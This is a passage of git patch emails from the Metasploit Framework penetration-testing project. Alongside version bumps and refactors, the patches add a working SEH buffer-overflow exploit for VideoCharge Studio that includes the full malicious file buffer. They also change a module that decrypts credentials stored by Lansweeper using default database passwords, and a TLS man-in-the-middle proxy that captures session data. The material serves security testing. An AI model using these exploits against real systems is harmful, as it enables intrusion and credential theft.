+++ b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
@@ -76,7 +76,7 @@ class Metasploit4 < Msf::Exploit::Remote
 
     cookie = res.get_cookies
 
-    unless cookie || cookie == ''
+    if cookie == nil || cookie == ''
       fail_with(Failure::Unknown, 'The server did not return a cookie to use in the later requests.')
     end
 

From 0b6a52e162987fa09737740ad7e3e9913568211d Mon Sep 17 00:00:00 2001
From: Brent Cook <bcook@rapid7.com>
Date: Tue, 4 Aug 2015 14:25:44 -0500
Subject: [PATCH 0945/1013] bump metasploit-framework gemspec version to match
 pro

---
 Gemfile.lock                        | 16 ++++++++--------
 lib/metasploit/framework/version.rb |  2 +-
 2 files changed, 9 insertions(+), 9 deletions(-)

diff --git a/Gemfile.lock b/Gemfile.lock
index b93b5fb156..f321a5fad4 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -1,7 +1,7 @@
 PATH
   remote: .
   specs:
-    metasploit-framework (4.11.3)
+    metasploit-framework (4.11.4)
       actionpack (>= 4.0.9, < 4.1.0)
       activesupport (>= 4.0.9, < 4.1.0)
       bcrypt
@@ -20,14 +20,14 @@ PATH
       rubyzip (~> 1.1)
       sqlite3
       tzinfo
-    metasploit-framework-db (4.11.3)
+    metasploit-framework-db (4.11.4)
       activerecord (>= 4.0.9, < 4.1.0)
       metasploit-credential (= 1.0.0)
-      metasploit-framework (= 4.11.3)
+      metasploit-framework (= 4.11.4)
       metasploit_data_models (= 1.2.5)
       pg (>= 0.11)
-    metasploit-framework-pcap (4.11.3)
-      metasploit-framework (= 4.11.3)
+    metasploit-framework-pcap (4.11.4)
+      metasploit-framework (= 4.11.4)
       network_interface (~> 0.0.1)
       pcaprub
 
@@ -104,7 +104,7 @@ GEM
     i18n (0.7.0)
     jsobfu (0.2.1)
       rkelly-remix (= 0.0.6)
-    json (1.8.2)
+    json (1.8.3)
     mail (2.6.3)
       mime-types (>= 1.16, < 3)
     metasploit-concern (1.0.0)
@@ -138,7 +138,7 @@ GEM
     mime-types (2.4.3)
     mini_portile (0.6.2)
     minitest (4.7.5)
-    msgpack (0.6.0)
+    msgpack (0.6.2)
     multi_json (1.11.1)
     multi_test (0.1.2)
     network_interface (0.0.1)
@@ -198,7 +198,7 @@ GEM
       rspec-core (~> 2.99.0)
       rspec-expectations (~> 2.99.0)
       rspec-mocks (~> 2.99.0)
-    rubyntlm (0.5.0)
+    rubyntlm (0.5.1)
     rubyzip (1.1.7)
     shoulda-matchers (2.8.0)
       activesupport (>= 3.0.0)
diff --git a/lib/metasploit/framework/version.rb b/lib/metasploit/framework/version.rb
index 4714f35499..033add379b 100644
--- a/lib/metasploit/framework/version.rb
+++ b/lib/metasploit/framework/version.rb
@@ -32,7 +32,7 @@ module Metasploit
 
       MAJOR = 4
       MINOR = 11
-      PATCH = 3
+      PATCH = 4
       PRERELEASE = 'dev'
       HASH = get_hash
     end

From 0e3434ebad360db95b7c9c943b7eda3c9c0842f9 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Tue, 4 Aug 2015 16:28:50 -0500
Subject: [PATCH 0946/1013] Fix metadata

---
 .../auxiliary/gather/lansweeper_collector.rb  | 61 +++++++++----------
 1 file changed, 30 insertions(+), 31 deletions(-)

diff --git a/modules/auxiliary/gather/lansweeper_collector.rb b/modules/auxiliary/gather/lansweeper_collector.rb
index 6eb9267098..88c43054e7 100644
--- a/modules/auxiliary/gather/lansweeper_collector.rb
+++ b/modules/auxiliary/gather/lansweeper_collector.rb
@@ -6,38 +6,37 @@ class Metasploit3 < Msf::Auxiliary
 
   def initialize(info = {})
     super(update_info(info,
-    'Name' => 'Lansweeper Collector',
-    'Description' => %q(
-    Lansweeper stores the credentials it uses to scan the computers
-    in its MSSQL database. The passwords are XTea-encrypted with a
-    68 character long key, which first 8 character is stored with the
-    password in the database, and the other 60 is static. Lansweeper by
-    default creates an MSSQL user "lansweeperuser" whose password is
-    "mysecretpassword0*", and stores its data in a database called
-    "lansweeperdb".
-    This module will query the MSSQL database for the credentials.
-    ),
-    'Author' => [
-      # Lansweeper RCE + Metasploit implementation
-      'sghctoma <tamas.szakaly [at] praudit [dot] hu>',
-      # Lansweeper RCE + discovering default credentials
-      'eq <balazs.bucsay [at] praudit [dot] hu>',
-      # Module for lansweeper (5.3.0.8)
-      'calderpwn <calderon [at] websec [dot] mx>'
-    ],
-    'License' => MSF_LICENSE,
-    'References' => [
-      [ 'URL', 'http://www.lansweeper.com'],
-      [ 'URL', 'http://www.praudit.hu/prauditeng/index.php/blog/a-lansweeper-es-a-tea']
-    ]
-                     )
-)
+      'Name' => 'Lansweeper Collector',
+      'Description' => %q(
+        Lansweeper stores the credentials it uses to scan the computers in its MSSQL database.
+        The passwords are XTea-encrypted with a 68 character long key, which first 8 character
+        are stored with the password in the database, and the other 60 is static. Lansweeper by
+        default creates an MSSQL user "lansweeperuser" whose password is "mysecretpassword0*",
+        and stores its data in a database called "lansweeperdb". This module will query the MSSQL
+        database for the credentials.
+      ),
+      'Author' =>
+        [
+          'sghctoma <tamas.szakaly[at]praudit.hu>', # Lansweeper RCE + Metasploit implementation
+          'eq <balazs.bucsay[at]praudit.hu>', # Lansweeper RCE + discovering default credentials
+          'calderpwn <calderon[at]websec.mx>' # Module for lansweeper (5.3.0.8)
+        ],
+      'License' => MSF_LICENSE,
+      'DefaultOptions'  =>
+        {
+          'USERNAME' => 'lansweeperuser',
+          'PASSWORD' => 'mysecretpassword0*'
+        },
+      'References' =>
+        [
+          ['URL', 'http://www.lansweeper.com'],
+          ['URL', 'http://www.praudit.hu/prauditeng/index.php/blog/a-lansweeper-es-a-tea']
+        ]))
+
+    register_options([
+      OptString.new('DATABASE', [true, 'The Lansweeper database', 'lansweeperdb'])
+    ], self.class)
 
-  register_options([
-    OptString.new('USERNAME', [ true, 'The username to authenticate as', 'lansweeperuser' ]),
-    OptString.new('PASSWORD', [ false, 'The password for the specified username', 'mysecretpassword0*' ]),
-    OptString.new('DATABASE', [ true, 'The Lansweeper database', 'lansweeperdb'])
-  ], self.class)
   end
 
   def uint32(n)

From ed3f993b750c474d7cd682d1ac27bb3ea62a12e5 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Tue, 4 Aug 2015 16:41:15 -0500
Subject: [PATCH 0947/1013] Do some style fixes

---
 .../auxiliary/gather/lansweeper_collector.rb  | 63 ++++++++++---------
 1 file changed, 35 insertions(+), 28 deletions(-)

diff --git a/modules/auxiliary/gather/lansweeper_collector.rb b/modules/auxiliary/gather/lansweeper_collector.rb
index 88c43054e7..7a523bea6b 100644
--- a/modules/auxiliary/gather/lansweeper_collector.rb
+++ b/modules/auxiliary/gather/lansweeper_collector.rb
@@ -43,62 +43,65 @@ class Metasploit3 < Msf::Auxiliary
     n & 0xffffffff
   end
 
-  def xteadecode(v, k)
-    num = 0xc6ef3720
-    num2 = uint32(v[0])
-    num3 = uint32(v[1])
+  def xtea_decode(v, k)
+    sum = 0xc6ef3720
+    v_0 = uint32(v[0])
+    v_1 = uint32(v[1])
 
     0.upto(0x1f) do
-      num3 -= uint32((uint32(num2 << 4) ^ uint32(num2 >> 5)) + num2) ^
-              uint32(num + k[uint32(num >> 11) & 3])
-      num3 = uint32(num3)
-      num -= 0x9e3779b9
-      num = uint32(num)
-      num2 -= ((uint32(uint32(num3 << 4) ^ uint32(num3 >> 5)) + num3) ^
-              uint32(num + k[num & 3]))
-      num2 = uint32(num2)
+      v_1 -= uint32((uint32(v_0 << 4) ^ uint32(v_0 >> 5)) + v_0) ^ uint32(sum + k[uint32(sum >> 11) & 3])
+      v_1 = uint32(v_1)
+      sum -= 0x9e3779b9
+      sum = uint32(sum)
+      v_0 -= (uint32(uint32(v_1 << 4) ^ uint32(v_1 >> 5)) + v_1) ^ uint32(sum + k[sum & 3])
+      v_0 = uint32(v_0)
     end
-    v[0] = num2
-    v[1] = num3
+
+    v[0] = v_0
+    v[1] = v_1
   end
 
-  def xteadecrypt(data, key)
+  def xtea_decrypt(data, key)
     k = key.ljust(16).unpack('VVVV')
     num = 0
     bytes = Array.new
 
     0.step(data.length - 1, 8) do |i|
       v = data[i, 8].unpack('VV')
-      xteadecode(v, k)
+      xtea_decode(v, k)
       bytes[num] = v[0]
       num += 1
       bytes[num] = v[1]
       num += 1
     end
+
     bytes.pack('c*')
   end
 
-  def lswgeneratepass
+  def lsw_generate_pass
     key = ''
-    for num in 0..60
+
+    (0..60).each do |num|
       key << [((40 - num) + ((num * 2) + num)) - 1].pack('c')
       key << [(num + 15) + num].pack('c')
     end
+
     key
   end
 
-  def lswdecrypt(data)
+  def lsw_decrypt(data)
     data = Rex::Text.decode_base64(data)
 
     first = data[0]
     pass = data[1, 8]
-    actualdata = data[9, data.length - 9]
+    actual_data = data[9, data.length - 9]
 
-    decrypted = xteadecrypt(actualdata, pass + lswgeneratepass)
+    decrypted = xtea_decrypt(actual_data, pass + lsw_generate_pass)
 
-    if first == "1"
+    if first == '1'
       decrypted = decrypted[0, decrypted.length - 2]
     end
+
     Rex::Text.to_ascii(decrypted, 'utf-16le')
   end
 
@@ -108,8 +111,9 @@ class Metasploit3 < Msf::Auxiliary
       port: opts[:port],
       protocol: 'tcp',
       workspace_id: myworkspace.id,
-      service_name: opts[:creds_name],
+      service_name: opts[:creds_name]
     }
+
     credential_data = {
       username: opts[:user],
       private_type: :password,
@@ -117,6 +121,7 @@ class Metasploit3 < Msf::Auxiliary
       origin_type: :service,
       module_fullname: self.fullname
     }.merge(service_data)
+
     login_data = {
       core: create_credential(credential_data),
       status: Metasploit::Model::Login::Status::UNTRIED
@@ -127,13 +132,15 @@ class Metasploit3 < Msf::Auxiliary
 
   def run
     unless mssql_login_datastore
-      fail_with(Failure::NoAccess, "Login failed. Check credentials.")
+      fail_with(Failure::NoAccess, 'Login failed. Check credentials.')
     end
-    result = mssql_query('select Credname, Username, Password from ' + datastore['DATABASE'] +
-    '.dbo.tsysCredentials WHERE LEN(Password)>64', false)
-    result[:rows].each do |row|
-      pw = lswdecrypt(row[2])
+    result = mssql_query("select Credname, Username, Password from #{datastore['DATABASE']}.dbo.tsysCredentials WHERE LEN(Password)>64", false)
+
+    result[:rows].each do |row|""
+      pw = lsw_decrypt(row[2])
+
       print_good("Credential name: #{row[0]} | username: #{row[1]} | password: #{pw}")
+
       report_cred(
         :host => rhost,
         :port => rport,

From 6fe76727329dbf6e2747ca86667a7dfc5f90dc27 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 7 Aug 2015 00:11:58 -0700
Subject: [PATCH 0948/1013] Improve Rex sockets usage

---
 .../server/jsse_skiptls_mitm_proxy.rb         | 61 ++++++++++++-------
 1 file changed, 39 insertions(+), 22 deletions(-)

diff --git a/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb b/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb
index b2e1f78e36..78fd609895 100644
--- a/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb
+++ b/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb
@@ -60,6 +60,21 @@ class Metasploit3 < Msf::Auxiliary
       ], self.class)
   end
 
+  def cleanup
+    super
+    return unless @proxy
+
+    begin
+      @proxy.deref if @proxy.kind_of?(Rex::Service)
+      if @proxy.kind_of?(Rex::Socket)
+        @proxy.close
+        @proxy.stop
+      end
+      @proxy = nil
+    rescue ::Exception
+    end
+  end
+
   def prf(secret, label, seed)
     if secret.empty?
       s1 = s2 = ''
@@ -93,21 +108,27 @@ class Metasploit3 < Msf::Auxiliary
     local_port = datastore['SRVPORT']
     port = datastore['PORT']
 
-    proxy = TCPServer.new(local_host, local_port)
-    print_status('Listening on %s:%d' % [proxy.addr[2], proxy.addr[1]])
+    #proxy = TCPServer.new(local_host, local_port)
+    @proxy = Rex::Socket::TcpServer.create(
+      'LocalHost' => local_host,
+      'LocalPort' => local_port,
+      'Context'   => {
+        'Msf' => framework,
+        'MsfExploit' => self
+      }
+    )
+    print_status('Listening on %s:%d' % [local_host, local_port])
 
     thread_num = 0
 
     loop do
-      framework.threads.spawn("Thread #{thread_num += 1}", false, proxy.accept) do |client|
-      #loop do
+      framework.threads.spawn("Thread #{thread_num += 1}", false, @proxy.accept) do |client|
+        add_socket(client)
         finished_sent = false
         handshake_messages = ''
         application_data = ''
 
-        #client = proxy.accept
-
-        print_status('Accepted connection from %s:%d' % [client.addr[2], client.addr[1]])
+        print_status('Accepted connection from %s:%d' % [client.peerhost, client.peerport])
 
         fake_server = Rex::Socket::Tcp.create(
           'PeerHost' => fake_host,
@@ -119,6 +140,7 @@ class Metasploit3 < Msf::Auxiliary
               'Msf'        => framework,
               'MsfExploit' => self
             })
+        add_socket(fake_server)
 
         print_status('Connected to %s:%d' % [fake_host, fake_port])
 
@@ -130,6 +152,7 @@ class Metasploit3 < Msf::Auxiliary
               'Msf'        => framework,
               'MsfExploit' => self
             })
+        add_socket(server)
 
         print_status('Connected to %s:%d' % [host, port])
 
@@ -143,12 +166,12 @@ class Metasploit3 < Msf::Auxiliary
                 # The fake_server (i.e., server) is an SSL socket; Read
                 # application data directly.
                 header = ''
-                fragment = r.readpartial(4096)
+                r.get_once(4096)
 
               else
-                header = r.read(5)
+                header = r.get_once(5)
                 raise EOFError if header.nil?
-                fragment = r.read(header[3, 2].unpack('n')[0])
+                fragment = r.get_once(header[3, 2].unpack('n')[0])
               end
 
               print_status('%d bytes received' % [header.length + fragment.length])
@@ -167,8 +190,7 @@ class Metasploit3 < Msf::Auxiliary
                 finished = "\x14#{[verify_data.length].pack('N')[1, 3]}#{verify_data}"
                 record = header[0, 3] + [finished.length].pack('n') + finished
 
-                count = client.write(record)
-                client.flush
+                count = client.put(record)
                 print_status('%d bytes sent' % [count])
 
                 finished_sent = true
@@ -194,13 +216,12 @@ class Metasploit3 < Msf::Auxiliary
               when client
                 if finished_sent
                   # The server (i.e., fake_server) is an SSL socket
-                  count = server.write(fragment)
+                  count = server.put(fragment)
                 else
                   # The server isn't an SSL socket
-                  count = server.write(header + fragment)
+                  count = server.put(header + fragment)
                 end
 
-                server.flush
                 print_status('%d bytes sent' % [count])
 
               when fake_server
@@ -208,14 +229,12 @@ class Metasploit3 < Msf::Auxiliary
                 # with the same version used in the handshake.
                 header = "\x17\x03#{version}" + [fragment.length].pack('n')
                 record = header + fragment
-                count = client.write(record)
-                client.flush
+                count = client.put(record)
                 print_status('%d bytes sent' % [count])
 
               when server
                 record = header + fragment
-                count = client.write(record)
-                client.flush
+                count = client.put(record)
                 print_status('%d bytes sent' % [count])
               end
             end
@@ -225,7 +244,7 @@ class Metasploit3 < Msf::Auxiliary
           path = store_loot(
             'tls.application_data',
             'application/octet-stream',
-            client.addr[2],
+            client.peerhost,
             application_data,
             'application_data',
             'TLS session application data'
@@ -245,8 +264,6 @@ class Metasploit3 < Msf::Auxiliary
         server.close
       end
     end
-
-    proxy.close
   end
 
 end

From 28ad0fccbd5134722050d871f1962c6543f503a0 Mon Sep 17 00:00:00 2001
From: jakxx <jakx.ppr@gmail.com>
Date: Fri, 7 Aug 2015 15:54:32 -0400
Subject: [PATCH 0949/1013] Added VideoCharge Studio File Format Exploit

---
 .../windows/fileformat/videocharge_studio.rb  | 92 +++++++++++++++++++
 1 file changed, 92 insertions(+)
 create mode 100644 modules/exploits/windows/fileformat/videocharge_studio.rb

diff --git a/modules/exploits/windows/fileformat/videocharge_studio.rb b/modules/exploits/windows/fileformat/videocharge_studio.rb
new file mode 100644
index 0000000000..6204fa1843
--- /dev/null
+++ b/modules/exploits/windows/fileformat/videocharge_studio.rb
@@ -0,0 +1,92 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::Seh
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'    => 'VideoCharge Studio 2.12.3.685 Buffer Overflow (SEH)',
+      'Description'  => %q{
+          This module exploits a stack based buffer overflow in VideoCharge Studio 2.12.3.685 when
+          processing a specially crafted .VSC file. This vulnerability could be
+          exploited by a remote attacker to execute arbitrary code on the target
+          machine by enticing a user of VideoCharge Studio to open a malicious .VSC file.
+      },
+      'License'    => MSF_LICENSE,
+      'Author'    =>
+        [
+          'metacom',  # Original discovery
+          'Andrew Smith',  # MSF Module
+        ],
+      'References'  =>
+        [
+          [ 'OSVDB', '69616' ],
+          [ 'CVE', '' ],
+          [ 'EBD', '29234' ]
+        ],
+      'DefaultOptions' =>
+        {
+          'ExitFunction' => 'process',
+        },
+      'Platform'  => 'win',
+      'Payload'  =>
+        {
+          'BadChars' => "\x00\x0a\x0d\x3c\x22\x26",
+          'DisableNops' => true,
+        },
+
+      'Targets'    =>
+        [
+          [ 'VideoCharge Studio 2.12.3.685',
+            {
+              'Ret'     =>  0x61B811F1, #p/p/r | zlib1.dll
+              'Offset'  =>  824
+            }
+          ],
+        ],
+      'Privileged'  => false,
+      'DisclosureDate'  => 'Oct 27 2013',
+      'DefaultTarget'  => 0))
+
+    register_options([OptString.new('FILENAME', [ false, 'The file name.', 'msf.vsc']),], self.class)
+
+  end
+
+  def exploit
+
+    buffer = "\x3C\x3F\x78\x6D\x6C\x20\x76\x65\x72\x73\x69\x6F\x6E\x3D\x22\x31\x2E\x30\x22"
+    buffer << "\x20\x65\x6E\x63\x6F\x64\x69\x6E\x67\x3D\x22\x57\x69\x6E\x64\x6F\x77\x73\x2D\x31\x32"
+    buffer << "\x35\x32\x22\x20\x3F\x3E\x3C\x63\x6F\x6E\x66\x69\x67\x20\x76\x65\x72\x3D\x22\x32\x2E"
+    buffer << "\x31\x32\x2E\x33\x2E\x36\x38\x35\x22\x3E\x0A\x0A\x3C\x63\x6F\x6C\x73\x20\x6E\x61\x6D"
+    buffer << "\x65\x3D\x22\x46\x69\x6C\x65\x73\x22\x2F\x3E\x0A\x0A\x3C\x63\x6F\x6C\x73\x20\x6E\x61"
+    buffer << "\x6D\x65\x3D\x22\x50\x72\x6F\x66\x69\x6C\x65\x73\x22\x3E\x0A\x0A\x3C\x50\x72\x6F\x70"
+    buffer << "\x65\x72\x74\x79\x20\x6E\x61\x6D\x65\x3D\x22\x50\x72\x6F\x66\x69\x6C\x65\x22\x3E\x0A"
+    buffer << "\x0A\x3C\x63\x6F\x6C\x73\x20\x6E\x61\x6D\x65\x3D\x22\x46\x6F\x72\x6D\x61\x74\x73\x22"
+    buffer << "\x3E\x0A\x0A\x3C\x50\x72\x6F\x70\x65\x72\x74\x79\x20\x6E\x61\x6D\x65\x3D\x22\x53\x74"
+    buffer << "\x72\x65\x61\x6D\x22\x3E\x0A\x0A\x3C\x56\x61\x6C\x75\x65\x20\x6E\x61\x6D\x65\x3D\x22"
+    buffer << "\x4E\x61\x6D\x65\x22\x20\x74\x79\x70\x65\x3D\x22\x38\x22\x20\x76\x61\x6C\x75\x65\x3D\x22"
+    buffer << make_nops(target['Offset']-payload.encoded.length)
+    buffer << payload.encoded
+    buffer << "\xeb\x06\x90\x90" #nseh negative jump
+    buffer << [target.ret].pack("V")
+    buffer << "\xe9\x3f\xfd\xff\xff" #long jump
+    buffer << "\x22\x2F\x3E\x0A\x0A\x3C\x2F\x50\x72\x6F\x70\x65\x72\x74\x79\x3E\x0A\x0A\x3C\x2F"
+    buffer << "\x63\x6F\x6C\x73\x3E\x0A\x0A\x3C\x63\x6F\x6C\x73\x20\x6E\x61\x6D\x65\x3D\x22\x52\x6F"
+    buffer << "\x6D\x61\x6E\x69\x61\x20\x53\x65\x63\x75\x72\x69\x74\x79\x20\x54\x65\x61\x6D\x22\x2F"
+    buffer << "\x3E\x0A\x0A\x3C\x2F\x50\x72\x6F\x70\x65\x72\x74\x79\x3E\x0A\x0A\x3C\x2F\x63\x6F\x6C"
+    buffer << "\x73\x3E\x0A\x0A\x3C\x2F\x63\x6F\x6E\x66\x69\x67\x3E"
+
+    print_status("Creating '#{datastore['FILENAME']}' file ...")
+    file_create(buffer)
+
+  end
+end
+

From 23f51bf2653cac025154b72d393f9f9ef4ec43ab Mon Sep 17 00:00:00 2001
From: jakxx <jakx.ppr@gmail.com>
Date: Fri, 7 Aug 2015 18:04:11 -0400
Subject: [PATCH 0950/1013] specify junk data

---
 modules/exploits/windows/fileformat/videocharge_studio.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/windows/fileformat/videocharge_studio.rb b/modules/exploits/windows/fileformat/videocharge_studio.rb
index 6204fa1843..58d3fb2132 100644
--- a/modules/exploits/windows/fileformat/videocharge_studio.rb
+++ b/modules/exploits/windows/fileformat/videocharge_studio.rb
@@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote
     buffer << "\x3E\x0A\x0A\x3C\x50\x72\x6F\x70\x65\x72\x74\x79\x20\x6E\x61\x6D\x65\x3D\x22\x53\x74"
     buffer << "\x72\x65\x61\x6D\x22\x3E\x0A\x0A\x3C\x56\x61\x6C\x75\x65\x20\x6E\x61\x6D\x65\x3D\x22"
     buffer << "\x4E\x61\x6D\x65\x22\x20\x74\x79\x70\x65\x3D\x22\x38\x22\x20\x76\x61\x6C\x75\x65\x3D\x22"
-    buffer << make_nops(target['Offset']-payload.encoded.length)
+    buffer << "\x41" * (target['Offset']-payload.encoded.length)
     buffer << payload.encoded
     buffer << "\xeb\x06\x90\x90" #nseh negative jump
     buffer << [target.ret].pack("V")

From bb74b6fecb51809115c39ce48fa36881918f2af8 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Sat, 8 Aug 2015 07:18:01 -0700
Subject: [PATCH 0951/1013] Fix data reading

---
 modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb | 12 ++++++++----
 1 file changed, 8 insertions(+), 4 deletions(-)

diff --git a/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb b/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb
index 78fd609895..dc10de195f 100644
--- a/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb
+++ b/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb
@@ -108,7 +108,6 @@ class Metasploit3 < Msf::Auxiliary
     local_port = datastore['SRVPORT']
     port = datastore['PORT']
 
-    #proxy = TCPServer.new(local_host, local_port)
     @proxy = Rex::Socket::TcpServer.create(
       'LocalHost' => local_host,
       'LocalPort' => local_port,
@@ -166,12 +165,17 @@ class Metasploit3 < Msf::Auxiliary
                 # The fake_server (i.e., server) is an SSL socket; Read
                 # application data directly.
                 header = ''
-                r.get_once(4096)
-
+                fragment = r.get_once(4096)
               else
                 header = r.get_once(5)
                 raise EOFError if header.nil?
-                fragment = r.get_once(header[3, 2].unpack('n')[0])
+                fragment_length = header[3, 2].unpack('n')[0]
+                fragment = ''
+                while fragment_length > 0
+                  partial_fragment = r.get_once(fragment_length)
+                  fragment << partial_fragment
+                  fragment_length = fragment_length - partial_fragment.length
+                end
               end
 
               print_status('%d bytes received' % [header.length + fragment.length])

From a0eef3880a4d8db216565e78b6a44a6a91f35bb3 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Sat, 8 Aug 2015 07:35:37 -0700
Subject: [PATCH 0952/1013] Initialize version local variable

---
 modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb b/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb
index dc10de195f..6fee235695 100644
--- a/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb
+++ b/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb
@@ -155,6 +155,7 @@ class Metasploit3 < Msf::Auxiliary
 
         print_status('Connected to %s:%d' % [host, port])
 
+        version = nil
         begin
           loop do
             readable, _, _ = IO.select([client, server])
@@ -206,7 +207,6 @@ class Metasploit3 < Msf::Auxiliary
 
                 # Save version used in the handshake
                 version = header[2, 1]
-
                 next
               else
                 # Save handshake messages

From 2707b3b402114a5ad74c55de618614743cf1cb1a Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Sat, 8 Aug 2015 07:40:19 -0700
Subject: [PATCH 0953/1013] Use Rex::ThreadSafe.select

---
 modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb b/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb
index 6fee235695..7d8e18556b 100644
--- a/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb
+++ b/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb
@@ -158,7 +158,7 @@ class Metasploit3 < Msf::Auxiliary
         version = nil
         begin
           loop do
-            readable, _, _ = IO.select([client, server])
+            readable, _, _ = Rex::ThreadSafe.select([client, server])
 
             readable.each do |r|
               case r

From a611fff7bf744bf9b6e011d25f2caae558b306eb Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Sat, 8 Aug 2015 07:43:39 -0700
Subject: [PATCH 0954/1013] Use Rex::ThreadSafe.select on CVE-2015-1793

---
 modules/auxiliary/server/openssl_altchainsforgery_mitm_proxy.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/auxiliary/server/openssl_altchainsforgery_mitm_proxy.rb b/modules/auxiliary/server/openssl_altchainsforgery_mitm_proxy.rb
index 52ed960db9..0ba01cad4a 100644
--- a/modules/auxiliary/server/openssl_altchainsforgery_mitm_proxy.rb
+++ b/modules/auxiliary/server/openssl_altchainsforgery_mitm_proxy.rb
@@ -183,7 +183,7 @@ class Metasploit3 < Msf::Auxiliary
 
         begin
           loop do
-            readable, _, _ = IO.select([client, server])
+            readable, _, _ = Rex::ThreadSafe.select([client, server])
 
             readable.each do |r|
               data = r.get_once

From e141d1451c15d81ae985b788d498f8592a1c690d Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Mon, 10 Aug 2015 09:33:38 +1000
Subject: [PATCH 0955/1013] Fix calls to stage_payload

---
 lib/msf/core/payload/generic.rb               | 26 ++++++-------------
 lib/msf/core/payload/stager.rb                |  2 +-
 .../payload/windows/reflectivedllinject.rb    |  2 +-
 .../windows/x64/reflectivedllinject.rb        |  2 +-
 4 files changed, 11 insertions(+), 21 deletions(-)

diff --git a/lib/msf/core/payload/generic.rb b/lib/msf/core/payload/generic.rb
index 91a288e599..0fda6c7757 100644
--- a/lib/msf/core/payload/generic.rb
+++ b/lib/msf/core/payload/generic.rb
@@ -20,23 +20,13 @@ module Payload::Generic
   def initialize(info = {})
     super(merge_info(info,
       'Arch'     => ARCH_ALL - [ARCH_TTY],
-      'Platform' => ''))
+      'Platform' => ''
+    ))
 
-    register_advanced_options(
-      [
-        OptString.new('PLATFORM',
-          [
-            false,
-            "The platform that is being targeted",
-            nil
-          ]),
-        OptString.new('ARCH',
-          [
-            false,
-            "The architecture that is being targeted",
-            nil
-          ])
-      ], Msf::Payload::Generic)
+    register_advanced_options([
+      OptString.new('PLATFORM', [false, "The platform that is being targeted", nil]),
+      OptString.new('ARCH', [false, "The architecture that is being targeted", nil])
+    ], Msf::Payload::Generic)
   end
 
   #
@@ -103,8 +93,8 @@ module Payload::Generic
   # Stager overrides
   #
 
-  def stage_payload
-    redirect_to_actual(:stage_payload)
+  def stage_payload(*args)
+    redirect_to_actual(:stage_payload, *args)
   end
 
   def stage_offsets
diff --git a/lib/msf/core/payload/stager.rb b/lib/msf/core/payload/stager.rb
index 574e3ef6ae..9d61ab3dce 100644
--- a/lib/msf/core/payload/stager.rb
+++ b/lib/msf/core/payload/stager.rb
@@ -88,7 +88,7 @@ module Msf::Payload::Stager
   # Can be nil if the final stage is not pre-assembled.
   #
   # @return [String,nil]
-  def stage_payload
+  def stage_payload(opts = {})
     return module_info['Stage']['Payload']
   end
 
diff --git a/lib/msf/core/payload/windows/reflectivedllinject.rb b/lib/msf/core/payload/windows/reflectivedllinject.rb
index 50139c1e4f..b740201d30 100644
--- a/lib/msf/core/payload/windows/reflectivedllinject.rb
+++ b/lib/msf/core/payload/windows/reflectivedllinject.rb
@@ -70,7 +70,7 @@ module Payload::Windows::ReflectiveDllInject
     ^
   end
 
-  def stage_payload
+  def stage_payload(opts = {})
     # Exceptions will be thrown by the mixin if there are issues.
     dll, offset = load_rdi_dll(library_path)
 
diff --git a/lib/msf/core/payload/windows/x64/reflectivedllinject.rb b/lib/msf/core/payload/windows/x64/reflectivedllinject.rb
index 0194d902d3..4a747a7359 100644
--- a/lib/msf/core/payload/windows/x64/reflectivedllinject.rb
+++ b/lib/msf/core/payload/windows/x64/reflectivedllinject.rb
@@ -71,7 +71,7 @@ module Payload::Windows::ReflectiveDllInject_x64
     ^
   end
 
-  def stage_payload
+  def stage_payload(opts = {})
     # Exceptions will be thrown by the mixin if there are issues.
     dll, offset = load_rdi_dll(library_path)
 

From 6e684d46f28363fb917fc5d0b2f1d51f9e2fc649 Mon Sep 17 00:00:00 2001
From: Alex Watt <alexcwatt@gmail.com>
Date: Mon, 10 Aug 2015 12:07:29 -0400
Subject: [PATCH 0956/1013] Ensure exceptions don't interfere with `busy`

---
 lib/rex/ui/text/dispatcher_shell.rb | 1 +
 1 file changed, 1 insertion(+)

diff --git a/lib/rex/ui/text/dispatcher_shell.rb b/lib/rex/ui/text/dispatcher_shell.rb
